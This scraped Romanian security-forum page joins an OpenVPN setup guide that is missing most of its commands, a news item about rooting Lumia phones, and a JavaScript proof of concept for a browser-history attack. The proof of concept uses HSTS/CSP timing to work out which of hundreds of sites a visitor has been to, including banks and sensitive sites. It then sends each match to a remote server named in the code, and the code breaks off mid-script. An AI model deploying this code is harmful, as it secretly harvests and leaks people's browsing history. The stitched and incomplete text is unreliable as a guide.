Nytro

About OpenVPN: If you’re looking for a way to safely and easily access the internet from either your smart phone, laptop or any other device from an untrusted network like some Hotel’s wifi or a restaurant’s. The answer to that question is a virtual private network (VPN) that gives you the ability to roam untrusted networks quite securely and privately like you were on a private and secure network. The traffic then comes out and makes it way to the required destination. Combining this setup with HTTPS connections lets you secure the wireless logins and the transactions that you make. One can also jump past all the geographical restrictions, censorships, shield their location and the unencrypted HTTP traffic from the network that is not trusted. OpenVPN is an open source, fully featured SSL (Secure Socket Layer) VPN answer that comprises on a vast range of configurations. This article will explain to you the way to set up in OpenVPN server on a Droplet and then change access to it from a different operating system like Windows, OS X, iOS or Android. The article will keep configuration and installation process as simple as it can be for these setups. Prerequisites: The only thing that you need beforehand is to have Ubuntu 14.04 Droplet up and running. You will need root access to complete the rest of the article. Step 1 (Install and Configure the Environment of OpenVPN Server) To setup the Server Side for your OpenVPN you need to complete the following step. OpenVPN Configuration We need to update Ubuntu’s repository lists before we install any packages. After doing so we can install Easy-RSA and OpenVPN. The file VPN server configuration must be extracted to /etc/openvpn so that we can add this to our setup. One single command can be used to do this. gunzip –c /usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz > /etc/openvpn/server.conf So when this has been extracted we must open server.conf in text editor. We will edit this by using Vim but you can use whichever text editor you want to. There are a number of changes to be made. You will see a section like this: Edit dh1024.pem to dh2048.pem Doing this will multiply the RSA key length to twice its original size while generating server and client keys. Stay inside server.conf and look for this section Remove the comment push “redirect-gateway defl bypass-dhcp”. By doing this, the VPN server passes on clients’ web traffic to is required destination. The next edit to be done here: Remove the comments so that the last two lines of the above section look like this: This will tell the server too push OpenDNS to the clients that are connected for DNS resolution wherever possible. This will help prevent the leakage off DNS requests outside the VPN connection. It is also necessary to mention the desired DNS resolvers in client devices too. Although OpenDNS is by default used by OpenVPN but you can use whichever DBS services you like. The last area to edit in server.conf is: Remove the comments from the last two lines of the section above so they may look as such: OpenVPN runs root user by default and in turn has full access to the system. OpenVPN will be restricted by us to just user nobody and group nogroup. This user has no ability to login and is simply just an unprivileged user. This user is also kept to run untrusted applications like web-facing servers. Changes must be saved and Vim must be closed now. Packet forwarding This setting is a sysctl setting and what it does is that it tells the server’s kernel to send the traffic from the client devices out through the internet. If not done so, the traffic will stop at the server. Packet forwarding should be enabled at runtime by this command: This should be made permanent so that the server may still forward traffic after the system reboots. At the top of the sysctl file, there will be: Uncomment net.ipv4.ip_forward. It should be like: Save what changes you have made and then exit. Uncomplicated Firewall (ufw) It’s a front end for iptables and setting it up is quite easy. It’s already present in Ubuntu 14.0.4 by default so all we have to do is configure some settings and rules and just switch the firewall on. Firstly set ufw to all SSH. In the command prompt ENTER : This article will use OpenVPN instead of UDP, ufw must be set such as to allow UDP traffic over port 1194. Now we have to set ufw forwarding policy. We’ll edit ufw’s primary file for this. Look for DEFAULT_FORWARD_POLICY=”DROP” and change it to DEFAULT_FORWARD_POLICY=”ACCEPT”. After doing this we will add some more rules for translation of network address and masquerading IPs of clients that are connected. Now make the top of the before.rules file look like it is below. The area in red for OPENVPN RULES will be added next: After the changes have been made, we can enable it. Go to command prompt: Doing so will return this prompt: Answer y. The result will then be: Now we’ll check ufw’s firewall status: Entering this command should return something like this: Step 2 – Creating A Certificate Authority and Server-Side Certificate And Key Certificates are used by OpenVPN to encrypt files. Configuring and Building the Certificate Authority Now it’s time to generate our own Certificate Authority (CA) and generate certificates and keys for the OpenVPN server. Bidirectional Authentication is supported based on certificated is supported by OpenVPN which means that the client and the server must authenticate the certificate before trust is mutually established between them. To do this we will use Easy RSA’s scripts that we copied earlier. Firstly we copy the Easy RSA generation scripts. Then the key storage directory should be made: There is a variables file that can be edited to create certificates exclusive to our business, person or whatever entity of our choice. This information will be copied to the keys and the certificates, later helping in identifying keys. The variables that are marked below in red should be changed so to what you prefer. In the very same vars file we also need to edit this one single line below. Just for the sake of simplicity we are using server as the key name. If you intend to use a different name then you’re going to need to update the OpenVPN configuration files that reference server.key and server.crt. Now we need to generate the Diffie-Hellman parameter which will take several minutes. Now we’ll me changing directories so that we can work directly out of where we moved the Easy RSA’s scripts to in STEP 2. Now we’ll be initializing the Public Key Infrastructure. Special attention is needed to be paid to the dot (.) and the space in front of. /vars command. This tells the current directory where we’re working. The output that is generated form the above command is shown below. There is nothing yet that has been generated y us in the keys directory so the warning is nothing to get alarmed about. Now we’ll make way for our new keys by clearing out all the old or possibly any existing keys that may be there in the directory: This last command invokes an interactive OpenSSL command and builds the certificate authority (CA). The output will ask you to confirm the variables that were entered before into the Easy RSA variable file. Just press ENTER to pass through every prompt. If you feel like something should be changed then you can do that from within the prompt. Generate a Certificate and Key for the Server We’re still working form /etc/openvpn/easy-rsa , now enter the command to build the key for the server. The server marked in red is the export KEY_NAME variable that we set in Easy RSA’s vars file in STEP 2. Same output is generated when we have the command. /build-ca , you can press ENTER again to confirm every line of the distinguished name. This time however you’ll see two addition prompts: Both spaces should be left blank, just press ENTER to skip each one. Two queries at the end require a positive (y) response: Lastly the above prompt should complete with: Move the Server Certificate and Keys OpenVPN is set by default to see the certificate, keys and the server’s CA in /etc/openvpn. Now we need to copy the required files into the proper location so that OpenVPN can easily access the files for further usage. If your copy was successful, you can verify it by: Now you should see the certificate and key files to the server in the desired location. Currently at this stage, the OpenVPN is up and ready to go. You should now start t and check the status. The command that you should see in return would be like this: Congratulations! You have successfully configured your OpenVPN server and it should be operational. If for some reason the status message says that the VPN is not running then you should take a closer look at your /var/log/syslog file for any bugs or errors such as: He error mentioned above indicates that server.key was not yet copied into /etc/openvpn correctly. You need to re-copy the file again to the directory and follow the procedure to try again and convert your OpenVPN to its operational state. Step 3 – Generate Certificates and Keys for Clients Up till now we have installed and configured the OpenVPN server. We created a Certificate Authority and created a certificate and keys just for the server. This step tells us how we use the server’s CA to make certificates and keys for every client device that is going to be connected to the VPN. All of these files will then be installed on to the client devices such as smartphones or laptops later on. Key and Certificate Building Ideally its required that each client connecting to the VPN have its own certificate and key. This is preferred to generating a general certificate and key for all the clients that are connected to the VPN. It should be noted that OpenVPN by default does not allow connections from clients using the same certificate and key to the server simultaneously. This step should be completed if you intend to create separate authentication credentials for each device that is to be connected to the VPN. Change the name client1 under to something different like client2 or iphone2. If we give every device its separate credentials then it can be individually deactivated at the server side when needed. The rest of the article shall use client1 as the example client device’s name. Now we’re going to build a key for the client1 as we did for the server. The working directory that you should be in is /etc/openvpn/easy-rsa . As with the case of the server you’ll be asked again to confirm or change the distinguished name variables and just like before these two should be left blank. Press ENTER to accept the default settings. Just like before, these two confirmations will need a (y) response at the end of the build process: If the key build succeeds then the output just like before will be: The example client configuration needs to be copied to the Easy-RSA key directory. This example configuration file shall be used as a template that will be downloaded to the client devices and then be edited. While copying we’ll be changing the name of the example file form client.conf to client.ovpn because the .ovpn is the extension that all the clients will expect to use. cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf /etc/openvpn/easy-rsa/keys/client.ovpn This section can be repeated for each client by replacing client1 with the right client name. Transferring Certificates and Keys to Client Devices Remember from the steps above that we created the keys and certificates and the directory in which we stored them after they were made was /etc/openvpn/easy-rsa/keys. For every client connected we must transfer the client profile template, certificate and key files to a folder either on our local computer or another client device. In this article the client1 device requires its keys and certificate that are located on the server in: The ca.crt and client.ovpn for all the clients stay exactly the same. These two files should also be downloaded. It should be noted that the ca.crt file is located in a different directory than others. The applications that are used to complete this transfer will solely depend on the choice that you make and the operating system on the device. You want the application to use SFTP (SSH file transfer protocol) or SCP (Secure copy protocol) on the backend. This will be useful as it will copy all the client’s VPN authentication files over an encrypted connection. At the end you must check if the following four files are present on your client device: client1.crt client1.key ovpn crt Step 4 – Creating a Unified OpenVPN Profile for Client Devices There are a number of methods that can be used to manage the client files but the easiest one is using a unified profile. This is done by editing the client.ovpn template file and including in it the server’s CA and the client’s key and certificate. Once all the files are merged in to one then only this single client.ovpn is needed to be imported in the client’s OpenVPN application. What we will do is that we will create a single profile for our client1 device on the computer to which we downloaded all the client files. This computer can itself be either a client or just another temporary work area to merge the authentication files. The client.ovpn template file should be renamed and duplicated. The ‘how you do this’ depends upon the operating system of your local computer. It should be noted that the name of the client.ovpn duplicated file need not be related to the client device. The OpenVPN application on the client-side will use the file name as an identifier for the VPN connection itself. What you should do is that you should duplicate client.ovpn to whatever nametag you want the VPN to be in your operating system. In this article we shall name the connection GeekEasier so GeekEasier.ovpn shall be the file name used from now on. Once it is named then we must open GeekEasier.ovpn in a text editor. You can use whichever text editor you prefer to use. The first area which you need to pay attention to is the IP address of your droplet. Almost near to the top of the file, we need to change my-server-1 to your VPN’s IP. After doing this we need to find the area that is shown below and then uncomment user nobody and user nogroup just like we did before in server.conf in STEP 1. This should be noted that this does not apply to the Windows operating system so you can skip it. It should like down below: The area that is below needs the three lines shown to be commented so that we can instead include the key and certificate directly in the GeekEasier.ovpn file. After you’re done it should look like this: Now we need to merge all the individual files into one single unified file. The contents of the ca.crt, client1.crt, and client1.key are pasted directly into the .ovpn profile using the XML-like syntax. The XML at the end should take this form: Once finished the end of the file should be the same as this abbreviated example: The client1.crt has a bit of extra information in it and it’s totally fine to just add the file. Save the changes that you have made and exit. We now have a unified OpenVPN client profile to configure our client1 with. Step 5 – Installing the Client Profile The thing that needs to be discussed now is how to install a client VPN profile on Android, iOS, OS X, and Windows. All of these client instructions are independent of others so you can skip to whichever one applies to you. This should be remembered that the connection will be called by the same name that you named the .ovpn file. In our example since the file name was GeekEasier.ovpn so the connection will be called GeekEasier. Windows Installing The OpenVPN client application for Windows can be downloaded from OpenVPN’s Downloads page. You have to choose the right version from the website for your Windows. This should be noted that administrative rights are required to install OpenVPN on Windows. After you have installed OpenVPN, copy the unified GeekEasier.ovpn profile to: When you open OpenVPN then it will automatically see the profile and make it available. OpenVPN requires that it be run as an administrator each time it is to be used even by the administrative accounts. Now to save the hassle of having to right-click and selecting Run as administrator every time you use VPN, you can preset this but the condition is that it must be done from an administrator account. This means that standard users need to enter the admin password to use OpenVPN. But if standard users do not have administrative rights then OpenVPN cannot connect to the server properly thus administrative privileges are quite necessary. To set the OpenVPN application to always run as the administrator just right-click on the shortcut icon and go to Properties. At the bottom of the Compatibility tab there will a button saying Change settings for all users, click on it. A new window will open; check the Run this program as an administrator box. Connecting Every time that you launch the OpenVPN GUI, Windows will ask you whether you want this progam to make changes to your computer or not. Click Yes. Executing the OpenVPN client application just puts the applet in the system tray so that the VPN can be connected and disconnected when needed but it does not make a VPN connection per se. Now that you have started OpenVPN, make a connection by moving the cursor down to the system tray applet and then by right-clicking on the applet icon of OpenVPN present there. Doing so will open the context menu. Select GeekEasier from the top of the menu which is basically our GeekEasier.ovpn profile and Connect to it. OSX Installing There is an open source VPN client for Mac OS X known as Tunnelblick. To download the latest disk image of this client just go to Tunnelblick Downloads page. After it has been downloaded, double click on the .dmg file and follow the steps to install. Almost near to the end of the installation process, Tunnelblick will ask you whether you have any configuration files or not. Answering it as No is easier and then it will finish. We have to add the client profiles and to do that we must open a finder window and then double click on GeekEasier.ovpn. To install the client profile we need administrative rights. Connecting Launch the Tunnelblick by double-clicking on Tunnelblick in the Applications folder. Once you have launched Tunnelblick, you will now be able to see a Tunnelblick icon in the menu bar at the top right of the screen that is used for controlling connections. Click on the icon, when the Connect menu opens you need to select the right connection. Select GeekEasierand connect to the VPN. IOS Installing We need to go to the iTunes App Store and search for and install OpenVPN Connect, the official iOS OpenVPN client application. Now we need to transfer our iOS client profile onto the device and to that we must connect the iOS device directly to the computer. Completing the transfer will be outlined here. From the computer open iTunes and click iPhone>apps. To the bottom of the File Sharing section click on the Open VPN app. The window to the right is blank, it is OpenVPN Documents and is used for sharing files. Now drage the .ovpn dile to the OpenVPN documents window. Now all you have to do is launch the app on the iPhone. You will get a notification that a new profile is ready to be imported. Tap the plus sign in green to import it. Connecting Now the OpenVPN app is ready to use with the new profile. The connection can be started by moving/sliding the Connect button to On position. If you want to disconnect it then move/slide the button to Off position. It should be noted that the VPN button in the Settings can never be used to connect to the VPN. If you try to do so, you will get a notice to connect to the OpenVPN app. Android Installing For android all we need to do is that we need to open Google Play Store. Search for Android OpenVPN and install the official Android client application. Copying the .ovpn file is not that hard. All we need to do is that we need to connect out Android device to the computer and then copy the file over to it. Similarly if you have a SD card reader, you can simply remove the memory card from the devoce and copy the .ovpn file onto it and then put the card back into the device. Now you will start the OpenVPN application and go to the menu to import the profile. Then go to the location where the profile has been saved. The screenshot uses the SD card location (/sdcard/download/ ) and from there select the file. The application will note that the profile has been imported. Conecting For connecting to the VPN just tap the Connect button. The application will prompt to ask whether you trust the OpenVPN application. Tap OK to start the connection. If you want to disconnect from the VPN, just go back to the OpenVPN application and choose Disconnect. Step 6 – Testing Your VPN Connection Once you have installed everything, a simple check can be made to tell whether everything is working properly or not. Without enabling a VPN connection, open a browser and go to DNSLeakTest. The website will return you an IP address that is assigned to you by your ISP (Internet Service provider) and also as you seem to the entire world as well. If you want to check your DNS stings from the same website, click on Extended Test and it will tell you which DNS server is being used by you. Now you will connect the OpenVPN client to the Droplet’s VPN and then refresh your browser. Now an IP address should appear that will be completely different from the one that was shown earlier. Now the entire world will recognize you by this IP address. Now again, DNSLeakTest’s Extended Test will check your DNS settings and then later confirm if you are now using the DNS resolvers pushed by your VPN. Congratulations to you! You can now securely traverse the internet protecting your cyber identity, location and traffic from censors and snoopers. Sursa: http://geekeasier.com/set-up-an-openvpn-server-on-ubuntu/3584/

Thanks. Da, e extinsa. Nu se vand/cumpara sau ofera gratuit astfel de lucruri.

Windows Phone Internals 1.0 - primul toolkit pentru root-area telefoanelor Lumia Aurelian Mihai - 26 nov 2015 Prin eforturile unui hacker foarte activ în comunitatea XDA Developer, utilizatorii de telefoane Lumina cu sistem Windows Phone vor putea de acum s?-?i personalizeze versiunea de OS instalat? la fel ca utilizatorii de Android. Astfel, cu Windows Phone Internals 1.0 po?i debloca bootloader-ul implicit de pe telefoanele Lumia ?i aplica procedeul de Root, ob?inând acces la m?runtaiele sistemului de operare ?i chiar posibilitatea de a instala ROM-uri Windows Phone neoficiale, modificând sau extinzând func?ionalitatea de baz? a dispozitivului. Potrivit dezvoltatorului cunoscut dup? pseudonimul Heathcliff, software-ul suport? deja ?majoritatea versiunilor de Windows Phone 8.1 ?i Windows 10 Mobile„. Desigur, ca ?i în cazul procedeului similar folosit pentru modificarea dispozitivelor cu Android, interven?iile aduse de utilizatori pot duce la pierderea garan?iei asigurate de produc?tor, în eventualitatea în care modific?rile f?cute duc la defectarea dispozitivului. Pentru moment, utilitatea kit-ului Windows Phone Internals este limitat?, neexistând înc? ROM-uri Windows Phone personalizate disponibile pentru instalare. Îns? lucrurile se vor schimba cu siguran?? dup? ce membrii comunit??ii XDA vor apuca s? experimenteze cu noul software. Sursa: Windows Phone Internals 1.0 - primul toolkit pentru root-area telefoanelor Lumia Imi plac articolele celor de la go4it.

Nu stiu daca s-a mai postat: https://crowdshield.com/bug-bounty-list.php

Remotely Sniffing Browser History via XSS Using HSTS + CSP This is a PoC/demo and on how to remotely "sniff" user's browsing history via Cross-Site Scripting (XSS) vulnerabilities via HSTS/CSP timing attacks. All credits for the original exploit go to @bcrypt which can be downloaded here:https://github.com/diracdeltas/sniffly. The below source code allows for remote exploitation of clients and remote dumping of positive matches back to a specified web browser. Source code: /** * @<a href="https://rstforums.com/forum/members/file/" target="_blank">file</a>overview This file loads a bunch of HSTS domains and times how long it * takes for them to be redirected from HTTP to HTTPS. Based on that, it * decides whether the domain is a previously-noted HSTS domain or not. * @author yan <yan@mit.edu> * @license MIT * @version 0.2.0 */ // Timing in milliseconds above which a network request probably occurred. // TODO: Determine this dynamically from the distribution of response times. var TIMING_UPPER_THRESHOLD = 5; // Timing in milliseconds below which a request time is probably a measurement // fluke. var TIMING_LOWER_THRESHOLD = -10; // Timing allowance for a synchronous image load, which we use to confirm // positive results in Chrome. var TIMING_CONFIRM_THRESHOLD = 20; // Use an arbitrary static preloaded HSTS host for timing calibration var BENCHMARK_HOST = 'http://torproject.org/'; // Initial timing calibration offset. This gets recalculated every other fetch. var OFFSET = 0; var visitedElem = document.getElementById('visited'); var notVisitedElem = document.getElementById('not_visited'); var disclaimer = document.getElementById('disclaimer'); var isFirefox = (window.navigator.userAgent.indexOf('Firefox') !== -1); var visited = []; // list of hosts that are potentially visited // Edit this based on scraper results. var hosts = ['http://www.npmjs.com/', 'http://savecrypto.org/', 'http://www.xoom.com/', 'http://atom.io/', 'http://angel.co/', 'http://vine.co/', 'http://www.oculus.com/en-us/', 'http://www.hackerrank.com/', 'http://noscript.net/', 'http://www.sixt.com/', 'http://www.crazydomains.com.au/', 'http://www.yola.com/', 'http://www.mailerlite.com/', 'http://giustizia.it/', 'http://notepad-plus-plus.org/', 'http://www.unfranchise.com.tw', 'http://www.ing-diba.de/', 'http://www.adreactor.com/', 'http://meduza.io/', 'http://www.wealthfront.com/', 'http://mail.live.com/default.aspx', 'http://muabannhanh.com/', 'http://upjers.com/', 'http://www.rabobank.nl/', 'http://www.ing.nl/', 'http://www.kickstarter.com/', 'http://creativemarket.com/', 'http://pinterest.com/', 'http://www.ashampoo.com/en/usd', 'http://www.sofort.com/', 'http://www.xing.com/', 'http://podio.com/', 'http://www.servis24.cz/', 'http://www.galeria-kaufhof.de/', 'http://www.kocpc.com.tw/', 'http://www.commbank.com.au/', 'http://recyclix.com/', 'http://www.usajobs.gov/', 'http://briian.com/', 'http://www.vultr.com/', 'http://about.gitlab.com/', 'http://www.tanga.com', 'http://wanelo.com/', 'http://herokuapp.com/', 'http://unsplash.com/', 'http://ria.com/', 'http://www.missguided.co.uk/', 'http://lever.co/', 'http://venmo.com/', 'http://ello.co/', 'http://www.template.net/', 'http://www.digid.nl/', 'http://qiwi.ru/', 'http://www.instacart.com/', 'http://www.touchofmodern.com/', 'http://roadtrippers.com/', 'http://www.freshdesignweb.com/', 'http://www.fnb.co.za', 'http://www.graphicsprings.com/', 'http://www.patreon.com/', 'http://hotwords.com/', 'http://www.cryptsy.com/', 'http://vitalsource.com/', 'http://pass.yandex.ua/', 'http://www.yammer.com/', 'http://ixquick.com/', 'http://sbis.ru/', 'http://www.ecosia.org/', 'http://www.freecycle.org/', 'http://pass.yandex.by/', 'http://www.mailjet.com/', 'http://www.yugster.com/', 'http://tinypng.com/', 'http://nest.com/', 'http://kat.cr/', 'http://www.practo.com/', 'http://c9.io/', 'http://beget.ru/', 'http://startpage.com/', 'http://www.bet-at-home.com/', 'http://tripcase.com/', 'http://www.douglas.de/', 'http://yande.re/post', 'http://www.bookbub.com/', 'http://www.swarmapp.com/', 'http://www.woorank.com/', 'http://paytm.com/', 'http://www.payza.com/', 'http://www.instapaper.com/', 'http://wikitech.wikimedia.org/', 'http://www.ipko.pl/', 'http://www.straighttalk.com/wps/portal/home', 'http://heroku.com/', 'http://www.privat24.ua', 'http://zimbra.free.fr/', 'http://www.blueapron.com/', 'http://secure.logmein.com/', 'http://adblockplus.org/', 'http://www.udemy.com/', 'http://tribalwars2.com/', 'http://sparkfun.com/', 'http://www.sparebank1.no/bank/', 'http://spotify.com/', 'http://creditkarma.com/', 'http://www.paxum.com/payment/phrame.php', 'http://jamberrynails.net/', 'http://fotolia.com/', 'http://stacksocial.com/', 'http://www.cms.gov/', 'http://iconfinder.com/', 'http://www.expireddomains.net/', 'http://navalny.com/', 'http://privatbank.ua/', 'http://www.englishforums.com/', 'http://www.hushmail.com/', 'http://www.pingdom.com/', 'http://www.zomato.com/', 'http://icook.tw/', 'http://www.office.com/', 'http://groupme.com/', 'http://wikimedia.org/', 'http://dapulse.com/', 'http://www.cuelinks.com/', 'http://www.attracta.com/', 'http://www.outlook.com/owa/', 'http://www.dnb.no/', 'http://www.lotterypost.com/', 'http://bitcoin.org/', 'http://href.li/', 'http://skandiabanken.no/', 'http://foursquare.com/', 'http://www.usa.gov/', 'http://www.bitgold.com/', 'http://quizlet.com/', 'http://www.alipay.com', 'http://yadi.sk/', 'http://duckduckgo.com/', 'http://www.dashlane.com/', 'http://www.ozbargain.com.au/', 'http://www.ricardo.ch/', 'http://www.fakku.net/', 'http://www.mturk.com/', 'http://www.national-lottery.co.uk/', 'http://www.onthebeach.co.uk/', 'http://www.icloud.com/', 'http://www.zenefits.com/', 'http://code.org/', 'http://www.chapters.indigo.ca/', 'http://www.dntx.com/', 'http://www.slsp.sk/', 'http://www.raise.com/', 'http://cinematrix.net/', 'http://www.baifubao.com/', 'http://blogun.ru/', 'http://videostripe.com/', 'http://typekit.com/', 'http://www.splitwise.com/', 'http://www.eobot.com', 'http://login.microsoftonline.com/', 'http://www.xero.com/', 'http://www.rakuten-sec.co.jp/', 'http://www.creativecow.net/', 'http://sweb.ru/', 'http://www.seroundtable.com/', 'http://www.hipchat.com/', 'http://subscribe.free.fr/', 'http://topvisor.ru/', 'http://www.avforums.com/', 'http://www.travelodge.co.uk', 'http://opendns.com/', 'http://www.pcloud.com/', 'http://www.akiba-online.com/', 'http://www.instamojo.com/', 'http://www.commsec.com.au/', 'http://assembla.com/', 'http://www.bukalapak.com/', 'http://www.docusign.net/', 'http://www.hotslogs.com/', 'http://www.consorsbank.de/home', 'http://www.searchlock.com/', 'http://madmimi.com/', 'http://www.bawagpsk.com/BAWAGPSK/PK', 'http://www.crunchbase.com/', 'http://www.maketecheasier.com/', 'http://session.wikispaces.com/1/auth/auth', 'http://witkit.com/', 'http://pixabay.com/', 'http://www.mygreatlakes.org/', 'http://ncore.cc/', 'http://www.hpconnected.com/', 'http://payeer.com/', 'http://join.me/', 'http://www.gamefly.com/', 'http://bitcoinwisdom.com/', 'http://land.nrw/', 'http://www.saddahaq.com/', 'http://www.quantcast.com/', 'http://www.behance.net/', 'http://xapo.com/', 'http://fabric.io/', 'http://www.dollarphotoclub.com/', 'http://mandrillapp.com/', 'http://moodle.org/', 'http://imp.free.fr/', 'http://www.pebble.com/', 'http://www.periscope.tv/', 'http://generalassemb.ly/', 'http://login.szn.cz/', 'http://www.lyft.com/', 'http://www.mql5.com/', 'http://www.wrike.com/', 'http://www.fanfiction.net', 'http://www.box.com/', 'http://www.test.de/', 'http://calendar.sunrise.am', 'http://www.djangoproject.com/', 'http://qiwi.com/', 'http://adlure.net/', 'http://www.stitchfix.com/', 'http://www.bankofthewest.com/', 'http://roem.ru/', 'http://www.carthrottle.com/', 'http://pass.yandex.kz/', 'http://gumroad.com/', 'http://www.hosteurope.de/', 'http://www.canva.com/', 'http://www.usbank.com/', 'http://evernote.com/', 'http://secure.actblue.com/', 'http://myspace.com/', 'http://www.jbhifi.com.au', 'http://www.physicsforums.com/', 'http://www.abnamro.nl/nl/index.html', 'http://twittercommunity.com/', 'http://wikileaks.org/', 'http://www.chmail.ir/', 'http://mail.ru', 'http://www.victoriassecret.com/', 'http://www.firstnational.com/', 'http://www.dominos.co.uk/', 'http://www.indiblogger.in/', 'http://www.zendesk.com/', 'http://www.hypovereinsbank.de/', 'http://www.openshift.com/', 'http://buffer.com/', 'http://what.cd/', 'http://hide.me/', 'http://trello.com/', 'http://www.comodo.com/', 'http://twilio.com/', 'http://www.alternate.de/', 'http://telegram.org/', 'http://www.manageengine.com/', 'http://unsw.edu.au/', 'http://www.flipkey.com/', 'http://www.popads.net/', 'http://myworkday.com/', 'http://www.meneame.net/', 'http://popcorntime.io/', 'http://iqoption.com/', 'http://www.tumblr.com/', 'http://www.reddit.com/', 'http://www.petfinder.com/', 'http://www.messenger.com/', 'http://www.digitalpoint.com/', 'http://www.blibli.com/', 'http://namu.wiki/', 'http://launchpad.net/', 'http://www.blognone.com/', 'http://www.ing.be/en/retail/Pages/index.aspx', 'http://acrobat.com/', 'http://mbank.pl/', 'http://www.fasttech.com/', 'http://www.post.ch/de', 'http://gyazo.com/', 'http://packagecontrol.io/', 'http://vimeo.com/', 'http://www.airbnb.es/', 'http://www.airbnb.it/', 'http://www.airbnb.fr/', 'http://www.airbnb.co.kr/', 'http://www.airbnb.de/', 'http://www.airbnb.co.uk/', 'http://www.airbnb.com.au/', 'http://www.airbnb.ca/', 'http://www.airbnb.co.in/', 'http://www.airbnb.com.br/', 'http://www.airbnb.ru/', 'http://www.centrum24.pl/centrum24-web/login', 'http://coursera.org/', 'http://ellislab.com/', 'http://www.udacity.com/', 'http://bitcointalk.org/', 'http://uwaterloo.ca/', 'http://vc.ru/', 'http://tjournal.ru/', 'http://www.biblegateway.com/', 'http://www.themuse.com', 'http://att.yahoo.com/', 'http://www.yahoo.com/', 'http://ficbook.net/', 'http://www.ameriprise.com/', 'http://www.here.com/', 'http://www.rocketlawyer.com/', 'http://exmo.com/', 'http://skladchik.com/', 'http://healthunlocked.com/', 'http://www.upwork.com/', 'http://www.thegioididong.com/', 'http://fermasosedi.ru/', 'http://www.thegrommet.com/', 'http://www.freelancer.com/', 'http://www.freelancer.in/', 'http://klout.com/', 'http://www.veikkaus.fi/', 'http://www.lucidchart.com/', 'http://www.opensuse.org/', 'http://monitorbacklinks.com/', 'http://www.5giay.vn/', 'http://noncombatant.org/', 'http://nonfreesoftware.org/', 'http://hackpad.com/', 'http://meta.discourse.org/', 'http://devinegan.com/', 'http://ongardie.net/', 'http://titanous.com/', 'http://www.funkthat.com', 'http://nelhage.com/', 'http://yawnbox.com/', 'http://rednerd.com', 'http://smbmarketplace.cisco.com/', 'http://www.cloudflare.com/', 'http://letsencrypt.org/', 'http://helloworld.letsencrypt.org/', 'http://hoffman-andrews.com/', 'http://jdkasten.com/', 'http://jhalderm.com/', 'http://jve.linuxwall.info/' ]; /** * Gets hostname from URL. */ function getHost_(url) { return url.replace('http://', '').split(/\/|\?/)[0]; } /** * Our CSP policy (HTTP-only images) causes this to fire whenever the img src * redirects to HTTPS, either by HSTS (307) or plain old redirects (301/302). * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {number} start Time when the image load started * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {string} host The host that fired the error * @<a href="https://rstforums.com/forum/members/private/" target="_blank">private</a> */ function onImgError_(start, host) { var time = new Date().getTime() - start; if (host === BENCHMARK_HOST) { // This is just a calibration measurement so update the offset time. OFFSET = time; } else { // We need to subtract offset, otherwise hosts that are further down on the // page seem to have higher load times because of the time that it took for // the DOM to load. display(host, time - OFFSET, OFFSET); } } /** * Double-check whether hosts have been visited by trying synchronous image * loads, which have cleaner timing profiles. I find this helps reduce the * false positive rate in Chrome. AFAICT, the async image-load sniffing method * works great in Firefox so this isn't necessary there. * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {function(string, number)} callback Gets called when img error fires. * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {function()} finished Called when all loads are done. * @<a href="https://rstforums.com/forum/members/private/" target="_blank">private</a> */ function confirmVisited_(callback, finished) { var initial; // initial time var img = new Image(); var timeouts = []; // array of timeout IDs var hostsDone = []; var dummySrc = 'http://example.com/'; // URL for timer initialization function clearTimeouts_() { // Clear existing timeouts timeouts.forEach(function(id) { window.clearTimeout(id); }); timeouts = []; } function doNext_() { if (visited.length === 0) { finished(); return; } // Shift instead of pop since we are pushing hosts into the array while // this is running var host = visited.shift(); initial = new Date().getTime(); var src = 'http://' + host + '/?' + initial.toString(); img.src = src; // Abort after 20ms since positive results should take less time anyway timeouts.push(window.setTimeout(img.onerror.bind({ src: src}), TIMING_CONFIRM_THRESHOLD)); } img.onerror = function() { if (this.src !== dummySrc) { clearTimeouts_(); var host = getHost_(this.src); if (hostsDone.indexOf(host) !== -1) { // We might have called the callback for this host already. console.log('already done, skipping', host); } else { hostsDone.push(host); callback(host, new Date().getTime() - initial); } } else { console.log('initialized timer using', this.src); } doNext_(); }; img.onload = function() { // Should never happen but add a callback in case so it doesn't block the // rest of the image requests from being sent. console.log('UNEXPECTEDLY LOADED', this.src); doNext_(); }; // Set the image source initially to a dummy URL b/c the first load seems to // always take a long time no matter what. img.src = 'http://example.com/'; } /** * Times how long a request takes by loading it as an img src and waiting for * the error to fire. I would use XHR here but it turns out CORS errors fire * before CSP. * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {string} host */ function timeRequest(host) { var img = new Image(); img.onerror = onImgError_.bind(this, new Date().getTime(), host); // Add random params so we don't hit the cache img.src = host + '?' + Math.random().toString().substring(2); } /** * Measures the calibration drift so we have a better estimate of how long * a resource fetch actually took. Since we expect the time T to fetch a * preloaded STS host to be ~constant, the fact that it changes indicates * that our timing is getting skewed by some amount, probably due to DOM * processing. Correct for the skew by subtracting T from measurements that * happen shortly after. */ function calibrateTime() { timeRequest(BENCHMARK_HOST); } /** * Display the results. * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {string} url * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {number} time * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {number} offset */ function display(url, time, offset) { var li = document.createElement('li'); var host = getHost_(url); li.id = host; li.appendChild(document.createTextNode(host)); if (time < TIMING_UPPER_THRESHOLD && time > TIMING_LOWER_THRESHOLD) { if (!isFirefox) { // If we are in Chrome, hide the results for now because the false // positive rate is really high until confirmVisited_() is called. li.style.color = 'lightgray'; } visitedElem.appendChild(li); visited.push(host); // +--== [ Remote Exploit by 1N3 @ CrowdShield - [URL]https://crowdshield.com[/URL] // Change url= to your own web server. var uri_visited = host; var uri = "http://xerosecurity.com/?redir=" + host; var port = 80; xhr = new XMLHttpRequest(); xhr.open("GET", uri + ":" + port, true); xhr.send(); } else { notVisitedElem.appendChild(li); } } if (!isFirefox) { // Chrome needs to do an extra timing confirmation step for results to be not // shitty. Wait 3 seconds for the async loads to mostly finish, then try one // synchrous load for each potentially-visited host. disclaimer.style.display = ''; window.setTimeout(function() { confirmVisited_(function(host, t) { if (!disclaimer.done_) { disclaimer.style.color = 'orange'; disclaimer.innerText = 'Removing false positives . 